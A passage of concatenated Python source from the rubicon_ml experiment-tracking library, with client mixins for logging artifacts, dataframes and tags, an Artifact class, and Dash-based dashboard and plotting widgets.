        artifact = domain.Artifact(
            name=name,
            description=description,
            parent_id=self._domain.id,
            tags=tags,
        )

        project_name, experiment_id = self._get_identifiers()

        # persist the artifact to every configured backend
        for repo in self.repositories:
            repo.create_artifact(artifact, data_bytes, project_name, experiment_id=experiment_id)

        return client.Artifact(artifact, self)
def _get_environment_bytes(self, export_cmd):
"""Get the working environment as a sequence of bytes.
Parameters
----------
export_cmd : list of str
The command to export the environment.
Returns
-------
bytes
A bytes sequence of the environment.
"""
try:
completed_process = subprocess.run(export_cmd, check=True, capture_output=True)
except subprocess.CalledProcessError as e:
raise RubiconException(e.stderr)
return completed_process.stdout
@failsafe
def log_conda_environment(self, artifact_name=None):
"""Log the conda environment as an artifact to this client object.
Useful for recreating your exact environment at a later date.
Parameters
----------
artifact_name : str, optional
The name of the artifact (the exported conda environment).
Returns
-------
rubicon.client.Artifact
The new artifact.
Notes
-----
Relies on running with an active conda environment.
"""
if artifact_name is None:
artifact_name = f"environment-{datetime.now().strftime('%Y_%m_%d-%I_%M_%S_%p')}.yml"
env_bytes = self._get_environment_bytes(["conda", "env", "export"])
artifact = self.log_artifact(data_bytes=env_bytes, name=artifact_name)
return artifact
@failsafe
def log_pip_requirements(self, artifact_name=None):
"""Log the pip requirements as an artifact to this client object.
Useful for recreating your exact environment at a later date.
Parameters
----------
artifact_name : str, optional
The name of the artifact (the exported pip environment).
Returns
-------
rubicon.client.Artifact
The new artifact.
"""
if artifact_name is None:
artifact_name = f"requirements-{datetime.now().strftime('%Y_%m_%d-%I_%M_%S_%p')}.txt"
requirements_bytes = self._get_environment_bytes(["pip", "freeze"])
artifact = self.log_artifact(data_bytes=requirements_bytes, name=artifact_name)
return artifact
@failsafe
def artifacts(self, name=None, tags=[], qtype="or"):
"""Get the artifacts logged to this client object.
Parameters
----------
name : str, optional
The name value to filter results on.
tags : list of str, optional
The tag values to filter results on.
qtype : str, optional
The query type to filter results on. Can be 'or' or
'and'. Defaults to 'or'.
Returns
-------
list of rubicon.client.Artifact
The artifacts previously logged to this client object.
"""
project_name, experiment_id = self._get_identifiers()
return_err = None
for repo in self.repositories:
try:
artifacts = [
client.Artifact(a, self)
for a in repo.get_artifacts_metadata(project_name, experiment_id=experiment_id)
]
except Exception as err:
return_err = err
else:
self._artifacts = filter_children(artifacts, tags, qtype, name)
return self._artifacts
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def artifact(self, name=None, id=None):
"""Get an artifact logged to this project by id or name.
Parameters
----------
id : str
The id of the artifact to get.
name : str
The name of the artifact to get.
Returns
-------
rubicon.client.Artifact
The artifact logged to this project with id `id` or name 'name'.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
artifacts = self.artifacts(name=name)
if len(artifacts) == 0:
raise RubiconException(f"No artifact found with name '{name}'.")
if len(artifacts) > 1:
warnings.warn(
f"Multiple artifacts found with name '{name}'. Returning most recently logged."
)
artifact = artifacts[-1]
return artifact
else:
project_name, experiment_id = self._get_identifiers()
return_err = None
for repo in self.repositories:
try:
artifact = client.Artifact(
repo.get_artifact_metadata(project_name, id, experiment_id), self
)
except Exception as err:
return_err = err
else:
return artifact
raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def delete_artifacts(self, ids):
"""Delete the artifacts logged to with client object
with ids `ids`.
Parameters
----------
ids : list of str
The ids of the artifacts to delete.
"""
project_name, experiment_id = self._get_identifiers()
for artifact_id in ids:
for repo in self.repositories:
repo.delete_artifact(project_name, artifact_id, experiment_id=experiment_id)
class DataframeMixin:
    """Adds dataframe support to a client object."""

    @failsafe
    def log_dataframe(self, df, description=None, name=None, tags=None):
        """Log a dataframe to this client object.

        Parameters
        ----------
        df : pandas.DataFrame or dask.dataframe.DataFrame
            The `dask` or `pandas` dataframe to log.
        description : str, optional
            The dataframe's description. Use to provide
            additional context.
        name : str, optional
            The dataframe's name.
        tags : list of str, optional
            The values to tag the dataframe with. Defaults to no tags.

        Returns
        -------
        rubicon.client.Dataframe
            The new dataframe.

        Raises
        ------
        ValueError
            If `tags` is not a list of strings.
        """
        # avoid a mutable default argument - the domain object below holds a
        # reference to `tags`, so a shared `[]` default could leak tags
        # across otherwise-unrelated calls if it were ever mutated
        if tags is None:
            tags = []
        if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
            raise ValueError("`tags` must be `list` of type `str`")

        dataframe = domain.Dataframe(
            parent_id=self._domain.id,
            description=description,
            name=name,
            tags=tags,
        )

        project_name, experiment_id = self._get_identifiers()

        # persist the dataframe to every configured backend
        for repo in self.repositories:
            repo.create_dataframe(dataframe, df, project_name, experiment_id=experiment_id)

        return client.Dataframe(dataframe, self)

    @failsafe
    def dataframes(self, name=None, tags=None, qtype="or"):
        """Get the dataframes logged to this client object.

        Parameters
        ----------
        name : str, optional
            The name value to filter results on.
        tags : list of str, optional
            The tag values to filter results on. Defaults to no
            tag filtering.
        qtype : str, optional
            The query type to filter results on. Can be 'or' or
            'and'. Defaults to 'or'.

        Returns
        -------
        list of rubicon.client.Dataframe
            The dataframes previously logged to this client object.

        Raises
        ------
        RubiconException
            If every configured storage backend fails.
        """
        # avoid a shared mutable `[]` default argument
        if tags is None:
            tags = []

        project_name, experiment_id = self._get_identifiers()
        return_err = None

        # try each configured backend in order, returning from the first
        # one that responds successfully
        for repo in self.repositories:
            try:
                dataframes = [
                    client.Dataframe(d, self)
                    for d in repo.get_dataframes_metadata(project_name, experiment_id=experiment_id)
                ]
            except Exception as err:
                return_err = err
            else:
                self._dataframes = filter_children(dataframes, tags, qtype, name)

                return self._dataframes

        raise RubiconException("all configured storage backends failed") from return_err

    @failsafe
    def dataframe(self, name=None, id=None):
        """Get the dataframe logged to this client object.

        Exactly one of `name` and `id` must be provided.

        Parameters
        ----------
        id : str
            The id of the dataframe to get.
        name : str
            The name of the dataframe to get.

        Returns
        -------
        rubicon.client.Dataframe
            The dataframe logged to this project with id `id` or name 'name'.
        """
        if (name is None and id is None) or (name is not None and id is not None):
            raise ValueError("`name` OR `id` required.")
        elif name is not None:
            dataframes = self.dataframes(name=name)

            if len(dataframes) == 0:
                raise RubiconException(f"No dataframe found with name '{name}'.")
            elif len(dataframes) > 1:
                warnings.warn(
                    f"Multiple dataframes found with name '{name}'."
                    " Returning most recently logged."
                )

            # dataframes are returned in logging order, so the last match is
            # the most recently logged
            return dataframes[-1]
        else:
            project_name, experiment_id = self._get_identifiers()
            return_err = None

            # try each configured backend in order, returning from the first
            # one that responds successfully
            for repo in self.repositories:
                try:
                    dataframe = client.Dataframe(
                        repo.get_dataframe_metadata(
                            project_name, experiment_id=experiment_id, dataframe_id=id
                        ),
                        self,
                    )
                except Exception as err:
                    return_err = err
                else:
                    return dataframe

            raise RubiconException("all configured storage backends failed") from return_err

    @failsafe
    def delete_dataframes(self, ids):
        """Delete the dataframes with ids `ids` logged to
        this client object.

        Each dataframe is deleted from every configured storage backend.

        Parameters
        ----------
        ids : list of str
            The ids of the dataframes to delete.
        """
        project_name, experiment_id = self._get_identifiers()

        for dataframe_id in ids:
            for repo in self.repositories:
                repo.delete_dataframe(project_name, dataframe_id, experiment_id=experiment_id)
class TagMixin:
    """Adds tag support to a client object."""
    def _get_taggable_identifiers(self):
        """Resolve the identifiers the repositories need to locate this entity.

        Returns
        -------
        tuple
            The parent project's name, the experiment id to scope the
            lookup to (or None), and this entity's own identifier (or None).
        """
        project_name, experiment_id = self._parent._get_identifiers()
        entity_identifier = None
        # experiments do not return an entity identifier - they are the entity
        if isinstance(self, client.Experiment):
            experiment_id = self.id
        # dataframes and artifacts are identified by their `id`s
        elif isinstance(self, client.Dataframe) or isinstance(self, client.Artifact):
            entity_identifier = self.id
        # everything else is identified by its `name`
        else:
            entity_identifier = self.name
        return project_name, experiment_id, entity_identifier
    @failsafe
    def add_tags(self, tags):
        """Add tags to this client object.

        Parameters
        ----------
        tags : list of str
            The tag values to add.

        Raises
        ------
        ValueError
            If `tags` is not a list of strings.
        """
        if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
            raise ValueError("`tags` must be `list` of type `str`")
        project_name, experiment_id, entity_identifier = self._get_taggable_identifiers()
        # update the in-memory domain model first, then persist the change
        # to every configured backend
        self._domain.add_tags(tags)
        for repo in self.repositories:
            repo.add_tags(
                project_name,
                tags,
                experiment_id=experiment_id,
                entity_identifier=entity_identifier,
                entity_type=self.__class__.__name__,
            )
    @failsafe
    def remove_tags(self, tags):
        """Remove tags from this client object.

        Parameters
        ----------
        tags : list of str
            The tag values to remove.
        """
        # NOTE(review): unlike `add_tags`, `tags` is not validated here -
        # confirm whether the asymmetry is intentional
        project_name, experiment_id, entity_identifier = self._get_taggable_identifiers()
        # update the in-memory domain model first, then persist the change
        # to every configured backend
        self._domain.remove_tags(tags)
        for repo in self.repositories:
            repo.remove_tags(
                project_name,
                tags,
                experiment_id=experiment_id,
                entity_identifier=entity_identifier,
                entity_type=self.__class__.__name__,
            )
    def _update_tags(self, tag_data):
        """Add or remove the tags in `tag_data` based on
        their key.

        `tag_data` is the sequence of persisted tag change records; each
        record may carry "added_tags" and/or "removed_tags".
        """
        for tag in tag_data:
            self._domain.add_tags(tag.get("added_tags", []))
            self._domain.remove_tags(tag.get("removed_tags", []))
    @property
    def tags(self):
        """Get this client object's tags."""
        project_name, experiment_id, entity_identifier = self._get_taggable_identifiers()
        return_err = None
        # try each configured backend in order, returning from the first
        # one that responds successfully
        for repo in self.repositories:
            try:
                tag_data = repo.get_tags(
                    project_name,
                    experiment_id=experiment_id,
                    entity_identifier=entity_identifier,
                    entity_type=self.__class__.__name__,
                )
            except Exception as err:
                return_err = err
            else:
                # replay the persisted add/remove records onto the domain
                # model before reading its tags
                self._update_tags(tag_data)
                return self._domain.tags
        raise RubiconException("all configured storage backends failed") from return_err
import os
import pickle
import warnings
import fsspec
from rubicon_ml.client.base import Base
from rubicon_ml.client.mixin import TagMixin
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.exceptions import RubiconException
class Artifact(Base, TagMixin):
    """A client artifact.

    An `artifact` is a catch-all for any other type of
    data that can be logged to a file.

    For example, a snapshot of a trained model (.pkl) can
    be logged to the `experiment` created during its run.
    Or, a base model for the model in development can be
    logged to a `project` when leveraging transfer learning.

    An `artifact` is logged to a `project` or an `experiment`.

    Parameters
    ----------
    domain : rubicon.domain.Artifact
        The artifact domain model.
    parent : rubicon.client.Project or rubicon.client.Experiment
        The project or experiment that the artifact is
        logged to.
    """

    def __init__(self, domain, parent):
        super().__init__(domain, parent._config)

        # lazily-loaded raw bytes, cached by the deprecated `data` property
        self._data = None
        self._parent = parent

    def _get_data(self):
        """Load and cache the data associated with this artifact.

        Tries each configured backend in order, stopping at the first
        one that responds successfully.
        """
        project_name, experiment_id = self.parent._get_identifiers()
        return_err = None

        for repo in self.repositories:
            # reset the cache so a failed backend does not leave stale data
            self._data = None

            try:
                self._data = repo.get_artifact_data(
                    project_name, self.id, experiment_id=experiment_id
                )
            except Exception as err:
                return_err = err
            else:
                return

        if self._data is None:
            raise RubiconException("all configured storage backends failed") from return_err

    @failsafe
    def get_data(self, unpickle=False):
        """Load the data associated with this artifact and
        unpickle if needed.

        Parameters
        ----------
        unpickle : bool, optional
            Flag indicating whether artifact data must be
            unpickled. Will be returned as bytes by default.
        """
        project_name, experiment_id = self.parent._get_identifiers()
        return_err = None

        # try each configured backend in order, returning from the first
        # one that responds successfully
        for repo in self.repositories:
            try:
                data = repo.get_artifact_data(project_name, self.id, experiment_id=experiment_id)
            except Exception as err:
                return_err = err
            else:
                if unpickle:
                    data = pickle.loads(data)

                return data

        raise RubiconException("all configured storage backends failed") from return_err

    @failsafe
    def download(self, location=None, name=None):
        """Download this artifact's data.

        Parameters
        ----------
        location : str, optional
            The absolute or relative local directory or S3
            bucket to download the artifact to. S3 buckets
            must be prepended with 's3://'. Defaults to the
            current local working directory.
        name : str, optional
            The name to give the downloaded artifact file.
            Defaults to the artifact's given name when logged.
        """
        if location is None:
            location = os.getcwd()

        if name is None:
            name = self._domain.name

        with fsspec.open(os.path.join(location, name), "wb", auto_mkdir=False) as f:
            # use `get_data` rather than the deprecated `data` property so
            # downloading does not emit a spurious `DeprecationWarning`
            f.write(self.get_data())

    @property
    def id(self):
        """Get the artifact's id."""
        return self._domain.id

    @property
    def name(self):
        """Get the artifact's name."""
        return self._domain.name

    @property
    def description(self):
        """Get the artifact's description."""
        return self._domain.description

    @property
    def created_at(self):
        """Get the time this artifact was created."""
        return self._domain.created_at

    @property
    def data(self):
        """Get the artifact's raw data.

        .. deprecated::
            Use `get_data` instead.
        """
        warnings.warn(
            "`data` is deprecated, use `get_data()` instead",
            DeprecationWarning,
        )

        if self._data is None:
            self._get_data()

        return self._data

    @property
    def parent(self):
        """Get the artifact's parent client object."""
        return self._parent
import dash_bootstrap_components as dbc
import pandas as pd
import plotly.express as px
from dash import dcc, html
from dash.dependencies import Input, Output
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common.colors import (
get_rubicon_colorscale,
light_blue,
plot_background_blue,
)
class DataframePlot(VizBase):
    """Plot the dataframes with name `dataframe_name` logged to the
    experiments `experiments` on a shared axis.

    Parameters
    ----------
    dataframe_name : str
        The name of the dataframe to plot. A dataframe with name
        `dataframe_name` must be logged to each experiment in `experiments`.
    experiments : list of rubicon_ml.client.experiment.Experiment, optional
        The experiments to visualize. Defaults to None. Can be set as
        attribute after instantiation.
    plotting_func : function, optional
        The `plotly.express` plotting function used to visualize the
        dataframes. Available options can be found at
        https://plotly.com/python-api-reference/plotly.express.html.
        Defaults to `plotly.express.line`.
    plotting_func_kwargs : dict, optional
        Keyword arguments to be passed to `plotting_func`. Available options
        can be found in the documentation of the individual functions at the
        URL above.
    x : str, optional
        The name of the column in the dataframes with name `dataframe_name`
        to plot across the x-axis.
    y : str, optional
        The name of the column in the dataframes with name `dataframe_name`
        to plot across the y-axis.
    """

    def __init__(
        self,
        dataframe_name,
        experiments=None,
        plotting_func=px.line,
        plotting_func_kwargs=None,
        x=None,
        y=None,
    ):
        super().__init__(dash_title="plot dataframes")

        self.dataframe_name = dataframe_name
        self.experiments = experiments
        self.plotting_func = plotting_func
        # copy the kwargs: `load_experiment_data` injects default values into
        # this dict, so storing the caller's dict (or a shared `{}` default
        # argument, as before) directly would leak those defaults across
        # instances and mutate the caller's dict
        self.plotting_func_kwargs = (
            {} if plotting_func_kwargs is None else dict(plotting_func_kwargs)
        )
        self.x = x
        self.y = y

    @property
    def layout(self):
        """Defines the dataframe plot's layout."""
        header_text = (
            f"showing dataframe '{self.dataframe_name}' "
            f"over {len(self.experiments)} experiment"
            f"{'s' if len(self.experiments) != 1 else ''}"
        )

        return html.Div(
            [
                # placeholder component used as a callback input to trigger
                # the initial render of the plot
                html.Div(id="dummy-callback-trigger"),
                dbc.Row(
                    html.H5(header_text, id="header-text"),
                    className="header-row",
                ),
                dcc.Loading(dcc.Graph(id="dataframe-plot"), color=light_blue),
            ],
            id="dataframe-plot-layout-container",
        )

    def load_experiment_data(self):
        """Load the experiment data required for the dataframe plot.

        Extracts the dataframe with name `self.dataframe_name` from
        each experiment in `self.experiments` and combines the data
        stored in them into one dataframe. All dataframes with name
        `dataframe_name` must have the same schema.
        """
        self.data_df = None

        for experiment in self.experiments:
            dataframe = experiment.dataframe(name=self.dataframe_name)
            data_df = dataframe.get_data()
            # tag each row with its source experiment so the combined frame
            # can be filtered and colored per-experiment
            data_df["experiment_id"] = experiment.id

            # default the axes to the first two columns of the first dataframe
            if self.x is None:
                self.x = data_df.columns[0]
            if self.y is None:
                self.y = data_df.columns[1]

            if self.data_df is None:
                self.data_df = data_df
            else:
                self.data_df = pd.concat([self.data_df, data_df])

        self.data_df = self.data_df.reset_index(drop=True)

        # only fill in plotting defaults the caller did not provide
        if "color" not in self.plotting_func_kwargs:
            self.plotting_func_kwargs["color"] = "experiment_id"

        if "color_discrete_sequence" not in self.plotting_func_kwargs:
            self.plotting_func_kwargs["color_discrete_sequence"] = get_rubicon_colorscale(
                len(self.experiments),
            )

    def register_callbacks(self, link_experiment_table=False):
        """Register the Dash callback that re-renders the plot.

        Parameters
        ----------
        link_experiment_table : bool, optional
            True to also re-render when the linked experiment table's
            row selection changes. Defaults to False.
        """
        outputs = [
            Output("dataframe-plot", "figure"),
            Output("header-text", "children"),
        ]
        inputs = [Input("dummy-callback-trigger", "children")]
        states = []

        if link_experiment_table:
            inputs.append(
                Input("experiment-table", "derived_virtual_selected_row_ids"),
            )

        @self.app.callback(outputs, inputs, states)
        def update_dataframe_plot(*args):
            """Render the plot specified by `self.plotting_func`.

            Returns the Plotly figure generated by calling `self.plotting_func`
            on the data in the experiments' dataframes and the header text
            with the dataframes' name.
            """
            if link_experiment_table:
                selected_row_ids = args[-1]
                selected_row_ids = selected_row_ids if selected_row_ids else []
            else:
                # without a linked table, every experiment is always shown
                selected_row_ids = [e.id for e in self.experiments]

            df_figure_margin = 30
            df_figure = self.plotting_func(
                self.data_df[self.data_df["experiment_id"].isin(selected_row_ids)],
                self.x,
                self.y,
                **self.plotting_func_kwargs,
            )
            df_figure.update_layout(margin_t=df_figure_margin, plot_bgcolor=plot_background_blue)

            # truncate each trace's legend entry to its first seven
            # characters to keep the legend compact
            for i in range(len(df_figure.data)):
                df_figure.data[i].name = df_figure.data[i].name[:7]

            header_text = (
                f"showing dataframe '{self.dataframe_name}' "
                f"over {len(selected_row_ids)} experiment"
                f"{'s' if len(selected_row_ids) != 1 else ''}"
            )

            return df_figure, header_text
import json
import numpy as np
import plotly.graph_objects as go
from dash import callback_context, dcc, html
from dash.dependencies import ALL, Input, Output
from rubicon_ml.viz.base import VizBase
from rubicon_ml.viz.common import dropdown_header
from rubicon_ml.viz.common.colors import get_rubicon_colorscale, light_blue, transparent
class MetricCorrelationPlot(VizBase):
    """Visualize the correlation between the parameters and metrics logged
    to the experiments `experiments` using a parallel coordinates plot.

    More info on parallel coordinates plots can be found here:
    https://plotly.com/python/parallel-coordinates-plot/

    Parameters
    ----------
    experiments : list of rubicon_ml.client.experiment.Experiment, optional
        The experiments to visualize. Defaults to None. Can be set as
        attribute after instantiation.
    metric_names : list of str
        The names of the metrics to load. Defaults to None, which loads all
        metrics logged to the experiments `experiments`.
    parameter_names : list of str
        The names of the parameters to load. Defaults to None, which loads all
        parameters logged to the experiments `experiments`.
    selected_metric : str
        The name of the metric to display at launch. Defaults to None, which
        selects the metric loaded first.
    """
    def __init__(
        self,
        experiments=None,
        metric_names=None,
        parameter_names=None,
        selected_metric=None,
    ):
        super().__init__(dash_title="plot metric correlation")
        self.experiments = experiments
        self.metric_names = metric_names
        self.parameter_names = parameter_names
        self.selected_metric = selected_metric
    def _get_dimension(self, label, values):
        """Transforms the input data for use with Plotly's parallel
        coordinates plot.

        Categorical (string or boolean) values are mapped to integer
        codes with human-readable tick labels; other values pass
        through as-is.

        Parameters
        ----------
        label : str
            The axis label for this dimension.
        values : list
            The values to plot along this dimension.

        Returns
        -------
        dict
            A dimension dict accepted by `plotly.graph_objects.Parcoords`.
        """
        if len(values) > 0 and any([isinstance(v, str) or isinstance(v, bool) for v in values]):
            values = [str(v) for v in values]
            # `np.unique` returns the sorted unique values and, with
            # `return_inverse`, each original value's index into them
            unique_values, values = np.unique(values, return_inverse=True)
            dimension = {
                "label": label,
                "ticktext": unique_values,
                "tickvals": list(range(0, len(unique_values))),
                "values": values,
            }
        else:
            dimension = {
                "label": label,
                "values": values,
            }
        return dimension
    @property
    def layout(self):
        """Defines the layout for the metric correlation plot."""
        return html.Div(
            [
                dropdown_header(
                    self.visible_metric_names,
                    self.selected_metric,
                    "comparing metric ",
                    f" over {len(self.experiments)} experiments",
                    "metric-correlation",
                ),
                dcc.Loading(
                    html.Div(
                        dcc.Graph(
                            id="metric-correlation-plot",
                        ),
                        id="metric-correlation-plot-container",
                    ),
                    color=light_blue,
                ),
            ],
            id="metric-correlation-plot-layout-container",
        )
    def load_experiment_data(self):
        """Load the experiment data required for the experiments table.

        Extracts parameter and metric metadata from each experiment in
        `self.experiments`. List metrics are ignored.

        Raises
        ------
        ValueError
            If `self.selected_metric` was provided but no experiment
            logged a metric with that name.
        """
        self.experiment_records = {}
        self.visible_metric_names = set()
        self.visible_parameter_names = set()
        for experiment in self.experiments:
            experiment_record = {"metrics": {}, "parameters": {}}
            for metric in experiment.metrics():
                if (
                    self.metric_names is None or metric.name in self.metric_names
                ) and not isinstance(metric.value, list):
                    experiment_record["metrics"][metric.name] = metric.value
                    self.visible_metric_names.add(metric.name)
                    # default the launch selection to the first metric seen
                    if self.selected_metric is None:
                        self.selected_metric = metric.name
            for parameter in experiment.parameters():
                if self.parameter_names is None or parameter.name in self.parameter_names:
                    experiment_record["parameters"][parameter.name] = parameter.value
                    self.visible_parameter_names.add(parameter.name)
            self.experiment_records[experiment.id] = experiment_record
        if self.selected_metric not in self.visible_metric_names:
            raise ValueError(
                f"no metric named `selected_metric` '{self.selected_metric}'"
                " logged to any experiment in `experiments`."
            )
        self.visible_parameter_names = list(self.visible_parameter_names)
        self.visible_metric_names = list(self.visible_metric_names)
        self.visible_metric_names.sort()
    def register_callbacks(self, link_experiment_table=False):
        """Register the Dash callback that re-renders the plot.

        Parameters
        ----------
        link_experiment_table : bool, optional
            True to also re-render when the linked experiment table's
            row selection changes. Defaults to False.
        """
        outputs = [
            Output("metric-correlation-plot", "figure"),
            Output("metric-correlation-dropdown", "label"),
            Output("metric-correlation-header-right-text", "children"),
        ]
        inputs = [
            Input({"type": "metric-correlation-dropdown-button", "index": ALL}, "n_clicks"),
        ]
        states = []
        if link_experiment_table:
            inputs.append(
                Input("experiment-table", "derived_virtual_selected_row_ids"),
            )
        @self.app.callback(outputs, inputs, states)
        def update_metric_plot(*args):
            """Render the correlation plot based on the currently selected metric.

            Returns the Plotly `Parcoords` figure generated by the values of the
            experiments' selected metric, the name of the currently selected
            metric, and the header text with the metric's name.
            """
            if link_experiment_table:
                selected_row_ids = args[-1]
                selected_row_ids = selected_row_ids if selected_row_ids else []
                experiment_records = [
                    self.experiment_records[row_id] for row_id in selected_row_ids
                ]
            else:
                experiment_records = self.experiment_records.values()
            # determine which component fired this callback; a dropdown
            # button's id encodes the selected metric's name in its "index"
            property_id = callback_context.triggered[0].get("prop_id")
            property_value = property_id[: property_id.index(".")]
            if not property_value or property_value == "experiment-table":
                # not triggered by the dropdown - keep the previous selection
                selected_metric = self.selected_metric
            else:
                selected_metric = json.loads(property_value).get("index")
                self.selected_metric = selected_metric
            header_right_text = (
                f"over {len(experiment_records)} experiment"
                f"{'s' if len(experiment_records) != 1 else ''}"
            )
            parameter_values = {}
            for parameter_name in self.visible_parameter_names:
                parameter_values[parameter_name] = [
                    record["parameters"].get(parameter_name) for record in experiment_records
                ]
            metric_values = [
                record["metrics"].get(selected_metric) for record in experiment_records
            ]
            plot_dimensions = []
            # only plot parameters that at least one experiment logged
            for parameter_name, parameter_value in parameter_values.items():
                if any([p is not None for p in parameter_value]):
                    plot_dimensions.append(self._get_dimension(parameter_name, parameter_value))
            # the selected metric is always the right-most dimension
            plot_dimensions.append(self._get_dimension(selected_metric, metric_values))
            metric_correlation_plot = go.Figure(
                go.Parcoords(
                    line={
                        "color": [m for m in metric_values if m is not None],
                        "colorscale": get_rubicon_colorscale(len(experiment_records)),
                        "showscale": True,
                    },
                    dimensions=plot_dimensions,
                ),
            )
            metric_correlation_plot.update_layout(paper_bgcolor=transparent)
            return metric_correlation_plot, selected_metric, header_right_text
import dash_bootstrap_components as dbc
from dash import html
from rubicon_ml.viz.base import VizBase
# Bootstrap's grid is 12 columns wide; map "widgets per row" to the column
# width each widget gets so a row always fills the full grid
COL_WIDTH_LOOKUP = {1: 12, 2: 6, 3: 4, 4: 3}
class Dashboard(VizBase):
    """Compose visualizations into a dashboard to view multiple widgets at once.

    Parameters
    ----------
    experiments : list of rubicon_ml.client.experiment.Experiment
        The experiments to visualize.
    widgets : list of lists of superclasses of rubicon_ml.viz.base.VizBase, optional
        The widgets to compose in this dashboard. The widgets should be instantiated
        without experiments prior to passing as an argument to `Dashboard`. Defaults
        to a stacked layout of an ExperimentsTable and a MetricCorrelationPlot.
    link_experiment_table : bool, optional
        True to enable the callbacks that allow instances of `ExperimentsTable` to
        update the experiment inputs of the other widgets in this dashboard. False
        otherwise. Defaults to True.
    """

    def __init__(self, experiments, widgets=None, link_experiment_table=True):
        super().__init__(dash_title="dashboard")

        self.experiments = experiments
        self.link_experiment_table = link_experiment_table

        if widgets is None:
            # local import - presumably avoids a circular import at module
            # load time; confirm before moving to the top of the file
            from rubicon_ml.viz import ExperimentsTable, MetricCorrelationPlot

            self.widgets = [
                [ExperimentsTable(is_selectable=True)],
                [MetricCorrelationPlot()],
            ]
        else:
            self.widgets = widgets

    @property
    def layout(self):
        """Defines the layout for the dashboard.

        Compiles the figures in `self.widgets` based on their positions
        in the given input list.
        """
        dashboard_rows = []
        for row in self.widgets:
            # skip empty rows rather than dividing by zero below
            if not row:
                continue

            # each row spans Bootstrap's 12-column grid; fall back to an
            # even split for row lengths not covered by the lookup so rows
            # of more than four widgets no longer raise a `KeyError`
            width = COL_WIDTH_LOOKUP.get(len(row), max(1, 12 // len(row)))

            row_widgets = [dbc.Col(widget.layout, width=width) for widget in row]
            dashboard_rows.append(dbc.Row(row_widgets))

        return html.Div(dashboard_rows)

    def load_experiment_data(self):
        """Load the experiment data required for the dashboard.

        Loads the experiment data for each widget in `self.widgets`.
        """
        for row in self.widgets:
            for widget in row:
                # the dashboard's experiments are shared with every widget
                widget.experiments = self.experiments
                widget.load_experiment_data()

    def register_callbacks(self):
        """Register each widget's callbacks on the dashboard's shared Dash app."""
        for row in self.widgets:
            for widget in row:
                widget.app = self.app
                widget.register_callbacks(self.link_experiment_table)
import os
import threading
import time
import dash_bootstrap_components as dbc
from dash import Dash, html
from rubicon_ml import __version__ as rubicon_ml_version
# module-level counter used to pick a default port for each served app;
# `VizBase.serve` advances it so successive apps default to distinct ports
_next_available_port = 8050
class VizBase:
    """The base class for all `rubicon_ml` visualizations.

    `VizBase` can not be directly instantiated. New widgets must all
    extend `VizBase`.
    """

    def __init__(
        self,
        dash_title="base",
    ):
        self.dash_title = f"rubicon-ml: {dash_title}"

    @property
    def layout(self):
        raise NotImplementedError("extensions of `VizBase` must implement property `layout(self)`")

    def build_layout(self):
        """Wraps the layout defined by `self.layout` in a container providing
        the `rubicon_ml` header.
        """
        self.app.layout = dbc.Card(
            dbc.CardBody(
                [
                    dbc.Row(
                        [
                            html.Img(
                                id="rubicon-logo-img",
                                src=self.app.get_asset_url("images/rubicon-logo-dark.png"),
                            ),
                        ],
                    ),
                    dbc.Row(html.P(rubicon_ml_version, id="version-text"), id="version-row"),
                    dbc.Row(self.layout),
                ],
                id="frame",
            ),
        )

    def load_experiment_data(self):
        raise NotImplementedError(
            "extensions of `VizBase` must implement `load_experiment_data(self)`"
        )

    def register_callbacks(self, link_experiment_table=False):
        raise NotImplementedError(
            "extensions of `VizBase` must implement `register_callbacks(self)`"
        )

    def serve(self, in_background=False, dash_kwargs=None, run_server_kwargs=None):
        """Serve the Dash app on the next available port to render the visualization.

        Parameters
        ----------
        in_background : bool, optional
            True to run the Dash app on a thread and return execution to the
            interpreter. False to run the Dash app inline and block execution.
            Defaults to False.
        dash_kwargs : dict, optional
            Keyword arguments to be passed along to the newly instantiated
            Dash object. Available options can be found at
            https://dash.plotly.com/reference#dash.dash.
        run_server_kwargs : dict, optional
            Keyword arguments to be passed along to `Dash.run_server`.
            Available options can be found at
            https://dash.plotly.com/reference#app.run_server. Most commonly,
            the 'port' argument can be provided here to serve the app on a
            specific port.

        Returns
        -------
        str or None
            The URL the app is served at when `in_background` is True,
            None otherwise.

        Raises
        ------
        RuntimeError
            If `self.experiments` is unset, or if the backgrounded server
            fails to start (e.g. the requested port is already in use).
        """
        # `None` defaults rather than `{}` so a single mutable dict is not
        # shared across every call as a default argument
        dash_kwargs = {} if dash_kwargs is None else dash_kwargs
        run_server_kwargs = {} if run_server_kwargs is None else run_server_kwargs

        if self.experiments is None:
            raise RuntimeError(
                f"`{self.__class__}.experiments` can not be None when `serve` is called"
            )

        self.app = Dash(
            __name__,
            external_stylesheets=[dbc.themes.LUX, dbc.icons.BOOTSTRAP],
            title=self.dash_title,
            **dash_kwargs,
        )

        self.load_experiment_data()
        self.build_layout()
        self.register_callbacks()

        global _next_available_port

        default_run_server_kwargs = {
            "dev_tools_silence_routes_logging": True,
            "port": _next_available_port,
        }
        default_run_server_kwargs.update(run_server_kwargs)
        # advance the shared counter so the next served app defaults to a
        # different port
        _next_available_port = default_run_server_kwargs["port"] + 1

        if in_background:
            running_server_thread = threading.Thread(
                name="run_server",
                target=self.app.run_server,
                kwargs=default_run_server_kwargs,
            )
            # daemonize so the server thread does not block interpreter exit
            running_server_thread.daemon = True
            running_server_thread.start()

            port = default_run_server_kwargs.get("port")
            if "proxy" in run_server_kwargs:
                host = default_run_server_kwargs.get("proxy").split("::")[-1]
            else:
                host = f"http://localhost:{port}"

            time.sleep(0.1)  # wait for thread to see if requested port is available
            if not running_server_thread.is_alive():
                raise RuntimeError(f"port {port} may already be in use")

            return host
        else:
            self.app.run_server(**default_run_server_kwargs)

    def show(self, i_frame_kwargs=None, dash_kwargs=None, run_server_kwargs=None):
        """Show the Dash app inline in a Jupyter notebook.

        Parameters
        ----------
        i_frame_kwargs : dict, optional
            Keyword arguments to be passed along to the newly instantiated
            IFrame object. Available options include 'height' and 'width'.
        dash_kwargs : dict, optional
            Keyword arguments to be passed along to the newly instantiated
            Dash object. Available options can be found at
            https://dash.plotly.com/reference#dash.dash.
        run_server_kwargs : dict, optional
            Keyword arguments to be passed along to `Dash.run_server`.
